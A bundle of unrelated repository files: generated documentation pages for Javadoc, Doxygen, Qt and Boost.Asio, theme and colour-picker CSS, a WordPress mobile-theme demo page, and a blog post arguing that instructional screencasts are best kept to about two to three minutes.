<!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li>Use</li> <li><a href="overview-tree.html">Tree</a></li> <li class="navBarCell1Rev">Deprecated</li> <li><a href="index-files/index-1.html">Index</a></li> <li><a href="help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="index.html?deprecated-list.html" target="_top">Frames</a></li> <li><a href="deprecated-list.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
wp-content/themes/alexchavet/layouts/content-sidebar.css
cyponthemic/Wordpress-Challenge
/* Theme Name: alexchavet Layout: Content-Sidebar */ .content-area { float: left; margin: 0 -25% 0 0; width: 100%; } .site-main { margin: 0 25% 0 0; } .site-content .widget-area { float: right; overflow: hidden; width: 25%; } .site-footer { clear: both; width: 100%; }
doc/doxygen/html/html/dir_e2cefa241a6bc59daf54bf75376b1523.html
jskelin/AGCS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <title>Another Garbage Collection Simulator: /home/doki/agcs/src/mmanager/alloc/ Directory Reference</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.5.5 --> <div class="navigation" id="top"> <div class="tabs"> <ul> <li><a href="main.html"><span>Main&nbsp;Page</span></a></li> <li><a href="pages.html"><span>Related&nbsp;Pages</span></a></li> <li><a href="classes.html"><span>Data&nbsp;Structures</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li><a href="dirs.html"><span>Directories</span></a></li> </ul> </div> <div class="navpath"><a class="el" href="dir_3ee8d47d1e7d2529b213f08ad2023402.html">src</a>&nbsp;&raquo&nbsp;<a class="el" href="dir_a6db0e8f9307db0331ebdd929b6e0b54.html">mmanager</a>&nbsp;&raquo&nbsp;<a class="el" href="dir_e2cefa241a6bc59daf54bf75376b1523.html">alloc</a> </div> </div> <div class="contents"> <h1>alloc Directory Reference</h1> <p> <table border="0" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr><td colspan="2"><br><h2>Files</h2></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="alloc_8c.html">alloc.c</a> <a href="alloc_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds memory allocation metafunction. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="alloc_8h.html">alloc.h</a> <a href="alloc_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="alloc_8c.html" title="This file holds memory allocation metafunction.">mmanager/alloc/alloc.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="copy_8c.html">copy.c</a> <a href="copy_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds function implementation used for copying memory blocks arround. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="copy_8h.html">copy.h</a> <a href="copy_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="copy_8c.html" title="This file holds function implementation used for copying memory blocks arround.">mmanager/alloc/copy.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="di__ff_8c.html">di_ff.c</a> <a href="di__ff_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds implementation of First Fit memory allocation algorithm. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="di__ff_8h.html">di_ff.h</a> <a href="di__ff_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="di__ff_8c.html" title="This file holds implementation of First Fit memory allocation algorithm.">mmanager/alloc/di_ff.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>drop.c</b> <a href="alloc_2drop_8c-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>drop.h</b> <a href="alloc_2drop_8h-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="free_8c.html">free.c</a> <a href="free_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds metafunction for freeing memory block. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="free_8h.html">free.h</a> <a href="free_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="free_8c.html" title="This file holds metafunction for freeing memory block.">mmanager/alloc/free.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>get.c</b> <a href="mmanager_2alloc_2get_8c-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>get.h</b> <a href="mmanager_2alloc_2get_8h-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>init.c</b> <a href="mmanager_2alloc_2init_8c-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>init.h</b> <a href="mmanager_2alloc_2init_8h-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="mg__bsd_8c.html">mg_bsd.c</a> <a href="mg__bsd_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds implementation of Kingsley BSD memory allocation algorithm. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="mg__bsd_8h.html">mg_bsd.h</a> <a href="mg__bsd_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="mg__bsd_8c.html" title="This file holds implementation of Kingsley BSD memory allocation algorithm.">mmanager/alloc/mg_bsd.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="mg__dl_8c.html">mg_dl.c</a> <a href="mg__dl_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds implementation of Doug Lea memory allocation algorithm. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="mg__dl_8h.html">mg_dl.h</a> <a href="mg__dl_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="mg__dl_8c.html" title="This file holds implementation of Doug Lea memory allocation algorithm.">mmanager/alloc/mg_dl.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="move_8c.html">move.c</a> <a href="move_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds function implementation used for moving memory blocks arround. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="move_8h.html">move.h</a> <a href="move_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="move_8c.html" title="This file holds function implementation used for moving memory blocks arround.">mmanager/alloc/move.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>print.c</b> <a href="mmanager_2alloc_2print_8c-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><b>print.h</b> <a href="mmanager_2alloc_2print_8h-source.html">[code]</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="sbrk_8c.html">sbrk.c</a> <a href="sbrk_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds implementation of internal sbrk. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="sbrk_8h.html">sbrk.h</a> <a href="sbrk_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="sbrk_8c.html" title="This file holds implementation of internal sbrk.">mmanager/alloc/sbrk.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="state_8c.html">state.c</a> <a href="state_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds implementation of functions that either set or return the allocator state. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="state_8h.html">state.h</a> <a href="state_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="state_8c.html" title="This file holds implementation of functions that either set or return the allocator...">mmanager/alloc/state.c</a>. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="ubits_8c.html">ubits.c</a> <a href="ubits_8c-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">This file holds metafunctions that operate on unused bits in used chunks headers. <br></td></tr> <p> <tr><td class="memItemLeft" nowrap align="right" valign="top">file &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="ubits_8h.html">ubits.h</a> <a href="ubits_8h-source.html">[code]</a></td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Header for <a class="el" href="ubits_8c.html" title="This file holds metafunctions that operate on unused bits in used chunks headers...">src/mmanager/alloc/ubits.c</a>. <br></td></tr> <p> </table> </div> <hr size="1"><address style="text-align: right;"><small>Generated on Mon Jul 14 10:11:32 2008 for Another Garbage Collection Simulator by&nbsp; <a href="http://www.doxygen.org/index.html"> <img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.5 </small></address> </body> </html>
doc/html/qgl-members.html
epatel/qt-mac-free-3.3.8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- /home/espenr/tmp/qt-3.3.8-espenr-2499/qt-mac-free-3.3.8/include/qgl.h:94 --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>QGL Member List</title> <style type="text/css"><!-- fn { margin-left: 1cm; text-indent: -1cm; } a:link { color: #004faf; text-decoration: none } a:visited { color: #672967; text-decoration: none } body { background: #ffffff; color: black; } --></style> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr bgcolor="#E5E5E5"> <td valign=center> <a href="index.html"> <font color="#004faf">Home</font></a> | <a href="classes.html"> <font color="#004faf">All&nbsp;Classes</font></a> | <a href="mainclasses.html"> <font color="#004faf">Main&nbsp;Classes</font></a> | <a href="annotated.html"> <font color="#004faf">Annotated</font></a> | <a href="groups.html"> <font color="#004faf">Grouped&nbsp;Classes</font></a> | <a href="functions.html"> <font color="#004faf">Functions</font></a> </td> <td align="right" valign="center"><img src="logo32.png" align="right" width="64" height="32" border="0"></td></tr></table><h1 align=center>Complete Member List for QGL</h1> <p>This is the complete list of member functions for <a href="qgl.html">QGL</a>, including inherited members. <ul> </ul> <!-- eof --> <p><address><hr><div align=center> <table width=100% cellspacing=0 border=0><tr> <td>Copyright &copy; 2007 <a href="troll.html">Trolltech</a><td align=center><a href="trademarks.html">Trademarks</a> <td align=right><div align=right>Qt 3.3.8</div> </table></div></address></body> </html>
boost/doc/html/boost_asio/reference/null_buffers/const_iterator.html
geodynamics/gale
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>null_buffers::const_iterator</title> <link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="../../../boost_asio.html" title="Boost.Asio"> <link rel="up" href="../null_buffers.html" title="null_buffers"> <link rel="prev" href="begin.html" title="null_buffers::begin"> <link rel="next" href="end.html" title="null_buffers::end"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td> <td align="center"><a href="../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="begin.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../null_buffers.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="end.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="section"> <div class="titlepage"><div><div><h4 class="title"> <a name="boost_asio.reference.null_buffers.const_iterator"></a><a class="link" href="const_iterator.html" title="null_buffers::const_iterator">null_buffers::const_iterator</a> </h4></div></div></div> <p> <a class="indexterm" name="id1441544"></a> A random-access iterator type that may be used to read elements. </p> <pre class="programlisting"><span class="keyword">typedef</span> <span class="keyword">const</span> <span class="identifier">mutable_buffer</span> <span class="special">*</span> <span class="identifier">const_iterator</span><span class="special">;</span> </pre> <a name="boost_asio.reference.null_buffers.const_iterator.requirements"></a><h6> <a name="boost_asio.reference.null_buffers.const_iterator.requirements-heading"></a> <a class="link" href="const_iterator.html#boost_asio.reference.null_buffers.const_iterator.requirements">Requirements</a> </h6> <p> <span class="bold"><strong>Header: </strong></span><code class="literal">boost/asio/buffer.hpp</code> </p> <p> <span class="bold"><strong>Convenience header: </strong></span><code class="literal">boost/asio.hpp</code> </p> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2003-2011 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="begin.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../null_buffers.html"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="end.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
demo/wow-mysite-wordpress-themeforest-mobile-theme.html
successdt/offshore_home
<!DOCTYPE html> <html> <head> <!-- Meta Data --> <title>WOW! Mobile Solutions - mySite</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="robots" content="index" /> <link rel="canonical" href="" /> <!-- Facebook open graph (this info needs to be changed on a per page basis --> <meta property="go:title" content=""/> <meta property="go:type" content=""/> <meta property="go:url" content=""/> <meta property="go:site_name" content=""/> <meta property="go:street-address" content=""/> <meta property="go:city" content=""/> <meta property="go:postal-code" content=""/> <meta property="go:country-name" content="United Kingdom"/> <meta property="go:email" content=""/> <meta property="go:phone_number" content=""/> <meta property="go:description" content="" /> <meta property="fb:admins" content=""/><!-- enter aka fb user id --> <meta name="viewport" content="width=1024" /> <!-- Stylesheets --> <link rel="stylesheet" media="screen" href="style.css" /> <link rel="stylesheet" media="screen" href="colorbox.css" /> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-31304377-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]--> </head> <!--[if lt IE 7 ]><body class="ie6"><![endif]--> <!--[if IE 7 ]><body class="ie7"><![endif]--> <!--[if IE 8 ]><body class="ie8"><![endif]--> <!--[if IE 9 ]><body class="ie9"><![endif]--> <!--[if (gt IE 9)|!(IE)]><!--><body><!--<![endif]--> <!-- Header --> <div id="header"> <header class="wrap"> <h1 class="logo">WOW! MOBILE SOLUTIONS</h1> <img src="library/images/wordpress.png" alt="WordPress Logo" class="wordpressLogo" /> <p class="wordpresstheme">A WordPress Theme!</p> </header> </div> <!-- Page --> <div id="page" class="cf"> <section class="wrap cf"> <article id="col1"> <h1>WOW! My Site</h1> <h2>Design your own mobile website<br> in minutes!</h2> <ul> <li class="li1">FAST ONE-CLICK INSTALLATION</li> <li class="li2">WORKS WITH iPHONE, ANDROID &amp; OTHER MAJOR SMARTPHONES</li> <li class="li3">9 COLOUR SCHEMES WITH UNLIMITED COLOUR VARIATIONS</li> <li class="li4">POWERFUL THEME CONFIGURATION PANEL</li> <li class="li2">USE STANDALONE OR WITH ANOTHER THEME</li> <li class="li5">MAINTAIN THE LOOK OF YOUR DESKTOP WEBSITE &amp; BRAND</li> <li class="li6">RETINA DISPLAY READY</li> <!--<li class="li7">PSD FILES INCLUDED</li>--> <li class="li8">EASY, SIMPLE &amp; FUN TO USE!</li> </ul> <!--<p class="getit">Get it now!</p>--> <p class="woocommerce-logo">WooCommerce</p> <div class="buyWrapper"> <a href="http://themeforest.net/item/wow-mysite-wordpress-mobile-theme/2348577" class="buynow" target="_top">Buy It Now!</a> </div> </article> <section id="col2"> <div id="roundall"> <img src="library/images/roundall-fast.png" alt="Fast 1 click install" width="170" height="170" border="0"> </div> <iframe id="wowFrame" class="iphone" name="wowFrame" width="320" height="480" border="0" frameborder="0" scrolling="no" vspace="0" hspace="0" marginheight="0" marginwidth="0" src="wow-blue/" allowTransparency="true"></iframe> <article> <div class="colorScheme"> <select name="color" id="color" onChange="updateIframe(this.value);"> <option value="wow-blue">Please Select</option> <option value="wow-blue">Modern Blue</option> <option value="wow-white">Elegant White</option> <option value="wow-green">Deep Green</option> <option value="wow-blue-light-green">Tech Blue &amp; Green</option> <option value="wow-grey">Cool Grey</option> <option value="wow-red">Rich Red</option> <option value="wow-black">Stylish Black</option> <option value="wow-orange">Orange Highlight</option> <option value="wow-purple">Harmony Purple</option> <option value="wow-blue-shop">WooCommerce Shops</option> <option value="wow-blue-shop">- Modern Blue</option> <option value="wow-white-shop">- Elegant White</option> <option value="wow-green-shop">- Deep Green</option> </select> </div> <label for="color" class="tryit">Try out 9 differentcolour schemes. Use these to build your own website!</label> <ul> <li class="scroll_up"><a onMouseOver="Scrollup()" onMouseOut="stopScroll()" href="javascript:void(0);">Scroll Up</a></li> <li class="scroll_down"><a onMouseOver="Scrolldown()" onMouseOut="stopScroll()" href="javascript:void(0);">Scroll Down</a></li> </ul> <p class="usetoscroll">Use to scroll</p> </article> </section> </section> </div> <!-- Footer --> <div id="footer"> <footer class="wrap"> &copy; WOW! Mobile Solutions 2013 </footer> </div> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script src="library/scripts/jquery.colorbox-min.js"></script> <script> $(document).ready(function(){ $(".youtube").colorbox({iframe:true, innerWidth:425, innerHeight:344}); }); </script> <script type="text/javascript"> function Scrollup() { wowFrame.scrollBy(0,-3); ScrollTimeID = setTimeout('Scrollup()',20); } function Scrolldown() { wowFrame.scrollBy(0,3); ScrollTimeID = setTimeout('Scrolldown()',20); } function stopScroll() { clearTimeout(ScrollTimeID); } function returnObjById( id ) { if (document.getElementById) var returnVar = document.getElementById(id); else if (document.all) var returnVar = document.all[id]; else if (document.layers) var returnVar = document.layers[id]; return returnVar; } function updateIframe(TVal){ returnObjById('wowFrame').src = 'http://www.wowmysite.co.uk/'+TVal; returnObjById('wowFrame').reload(); } </script> </body> </html>
media/jseblod/moorainbow/moorainbow.css
guezaqiezs/WebsiteTest
/*** * - mooRainbow: defaultCSS * author: w00fz <w00fzIT@gmail.com> */ #mooRainbow { color: #666; } .moor-box { width: 352px; /* default 390x310 */ height: 170px; border: 1px solid #ccc; background-color: #fff; } .moor-overlayBox { width: 150px; /* default 256x256 */ height: 150px; margin-top: 9px; margin-left: 9px; border: 1px solid #ccc; } .moor-slider { border: 1px solid #ccc; margin-top: 9px; margin-left: 174px; /* default 280 */ width: 19px; /* default 19x256 */ height: 150px; cursor: n-resize; } .moor-colorBox { border: 1px solid #ccc; width: 59px; height: 34px; margin-top: 9px; margin-left: 208px; /* default 315 */ } .moor-chooseColor { /* Top Box Color, the choosen one */ margin-top: 10px; margin-left: 209px; /* default 316 */ width: 59px; height: 34px; } .moor-currentColor { /* Bottom Box Color, the backup one */ margin-top: 9px; margin-left: 282px; /* default 316 */ width: 59px; height: 34px; border: 1px solid #ccc; } .moor-okButton { margin-top: 141px; margin-left: 320px; background: #fff; width: 16px; height: 16px; border: 0; background-image: url(images/color.png); background-repeat: no-repeat; } #mooRainbow label { font-weight: bold; } /* Following are just <label> */ .moor-rLabel { margin-top: 60px; margin-left: 216px; } .moor-gLabel { margin-top: 85px; margin-left: 215px; } .moor-bLabel { margin-top: 110px; margin-left: 216px; } .moor-HueLabel { margin-top: 60px; margin-left: 290px; } .moor-SatuLabel { margin-top: 85px; margin-left: 290px; } .moor-BrighLabel { margin-top: 110px; margin-left: 290px; } .moor-hexLabel { margin-top: 142px; margin-left: 216px; } /* <input> */ .moor-rInput, .moor-gInput, .moor-bInput, .moor-HueInput, .moor-SatuInput, .moor-BrighInput { width: 30px; } .moor-hexInput { width: 55px; } .moor-cursor { background-image: url(images/moor_cursor.gif); width: 12px; height: 12px; } .moor-arrows { background-image: url(images/moor_arrows.gif); top: 9px; left: 164px; /* default 270 */ width: 41px; height: 9px; }
_posts/2010/2010-03-09-3-avoiding-a-sense-of-rambling-developing-a-personal-voice-in-audio-series.html
tomjohnson1492/tomjohnson1492.github.io
--- title: Avoiding a sense of rambling (Voiceover) categories: - screencasting keywords: - attention span - focus - length - patience - personal voice - rambling - videos tags: - series_voiceover_techniques series: "Voiceover techniques" jtype: notes_voiceover_techniques weight: 1.5 --- {% include series/seriesTagVoiceoverTechniques.html %} <p>A while ago I was gathering feedback on different tech comm deliverables. I asked a user if she preferred videos or written material when learning software. I thought she would immediately say "videos," but it was a toss up for her. In her mind, videos involved long stretches of narration that included sitting passively at her computer, waiting for the narrator to get to her question but never really getting there.</p> <p>A lot of people feel the same way about videos. In a recent post, <a href="http://kwritenow.wordpress.com/2010/01/14/screencasts-so-what/" target="_blank">Kristi Leach</a> explains an attitude she once held about instructional videos:</p> <blockquote><p>I rarely appreciate video instructions, either–they take too long, because I'm pausing, following the step, playing, pausing again. I was having trouble imagining how videos were going to improve our help systems or fit into our schedules.</p></blockquote> <p>For Kristi, prior to her turnaround screencast moment, videos seemed to take too long and were difficult to follow along with in a step-by-step way.</p> <p>When you write a script for a video (or when you create a general outline), you can avoid the problem of the <em>eternal</em> video -- which I refer to as a sense of rambling -- by simply keeping the video short. Don't try to cover too much ground. You can generally speak about 100 words a minute, so keep that in mind with your script. 200 words is a good length. </p> <p>If you don't believe me, when you watch videos, look at the video's time counter and note when you start losing your attention. My patience times out at about three minutes. So I always try to keep my videos at three minutes or less.</p> <h3>Video Length</h3> <p>Guidelines for video length are somewhat controversial. Part of the problem is that video content varies dramatically. If you're watching an episode on Hulu.com, that's different from a humorous clip on youtube, which is also different from an instructional video about a software application.</p> <p><a href="http://video2zero.com/ideal-length-for-web-video/" target="_blank">Video2zero</a> conducted a study and found the "ideal run-time for web video 2.5 - 4 minutes." <a href="http://visuallounge.techsmith.com/2009/04/screencasting_-_what_is_the_id.html" target="_blank">Betsy Weber</a> of TechSmith says, "For the blog, my goal is usually around a 3-5 minute video."</p> <p><a href="http://www.brooksandrus.com/blog/2009/03/13/the-power-of-constraints-why-user-generated-web-video-needs-to-be-twitterfied/" target="_blank">Brooks Andrus</a> says we should consider Twitter a model for brevity when creating videos. He explains:</p> <blockquote><p>... most [users] don't have the tools or narrative capabilities to hold the attention of an audience for any real span of time. This is especially true in the screencasting realm which is why I'd like to propose the notion of TweetCasts–120 seconds or less of webcam or screen video. That's all the time you get to make your point. If you need more time, break your content into chunks, give viewers a rest between segments and try engaging them through a different medium.</p></blockquote> <p>I agree with Brooks. As informal video producers, we don't have the time to implement mesmerizing Hollywood cinematic techniques to keep our audience's attention. It's better to break long segments up into little chunks. It might be good to actually keep videos at 120 seconds, as Brooks recommends. Although sometimes you need up to three or four minutes to actually explain a feature, there's no reason you can't have several videos about the same feature.</p> <p>Look at how <a href="http://lynda.com" target="_blank">Lynda.com</a> approaches their videos. The following is a breakdown of videos about PowerPoint.</p> <p><figure><img class="size-full wp-image-5845" title="Lynda.com sample outline" alt="Lynda.com sample outline" src="https://s3.us-west-1.wasabisys.com/idbwmedia.com/images/timeshort11.png" width="550" height="384" /> <figcaption>Lynda.com sample outline</figcaption></figure></p> <p>This approach allows the user to skip to the part he or she wants to know. For example, in the above list of videos, I viewed only the videos with the eye icon next to them. Because the videos were chunked into small units, I could skip the video content I didn't want to sit through. Small chunks give the user control and avoid the problem of never-ending rambling that I explained earlier.</p> <h3>Advantages to Short Videos</h3> <p>Aside from maintaining the user's attention, keeping your videos short has several other advantages:</p> <p><strong>No worries about load time.</strong> A three-minute video rarely results in a file size of more than 10 MB. In contrast, with a 10 minute video, it could easily be 30 MB, which creates more problems when you deliver it. With large file sizes, you have to consider how to optimize the video. Do you reduce the visual and audio clarity? Do you force users to wait for it to load? Do you resort to streaming options? You don't have to worry about file sizes and load time when your video is short.</p> <p><strong>You make fewer mistakes creating it.</strong> When you record a video, if you only have two minutes, you're less likely to make mistakes than with longer videos. If the script is short, you can more quickly rehearse and practice the steps so you know what you're going to say, what you're going to click, and you can make sure all the glitches are out before recording. In contrast, with a 10 minute video, you set yourself up for numerous mistakes in both narration and demonstration.</p> <p><strong>Post-production is easier too. </strong>If you have a short video, it's a lot easier to edit in post-production than a long video. With a long video, you may end up with multiple video segments on your timeline, with several audio tracks, each at specific points on the timeline. Editing an eight or ten minute video can be a nightmare in video choreography. Sliding over audio in one section can produce gaps in another section, and so on. It's just a lot easier if the video is short.</p> <p><strong>No need for a TOC pane.</strong> If you have a long video, you usually need to add a table of contents so the user can see what you're covering and when. But adding a TOC pane takes up precious screen real estate that usually you don't have. If you record your videos at 1024 x 768, adding a 175px TOC pane on the left increases your video's size to about 1200px, in addition to whatever space the browser frame takes up. You usually can't assume your viewers will have that much screen real estate. If you shrink your videos, you often end up with fuzzy displays. In contrast, short videos don't need a TOC because the purpose of the video is focused.</p> <p><strong>Active learning increases.</strong> If your video is short, you increase the sense of active learning that takes place. By <em>active learning </em>I mean you give users control to make decisions, to click to the video they want to see.  This keeps the users more engaged. In contrast, if you force users to sit for extended periods of time in a passive state of mind, without allowing them to choose their own adventure, their minds turn numb. To keep their attention in a long video, you have to resort to all kinds of interactive strategies or cinematic techniques so they don't fall asleep. Quizzes, branching, let-me-try situations, bending window panes that fly in and out, dynamic illustrations and diagrams -- these are all good, but if you don't have time to implement them, keeping your videos short decreases the need for these tactics.</p> <p>It can be hard to keep the video short, because sometimes we feel we have to tackle an entire component in one go. But it's not hard to break a video up into multiple subvideos about the same topic. And what viewer wouldn't rather click on several two-minute videos than sit through a ten-minute video with an eternally rambling narrator?</p> {% include series/seriesTagVoiceoverTechniques_next.html %}
jsduck/source/clientDetailCtrl.html
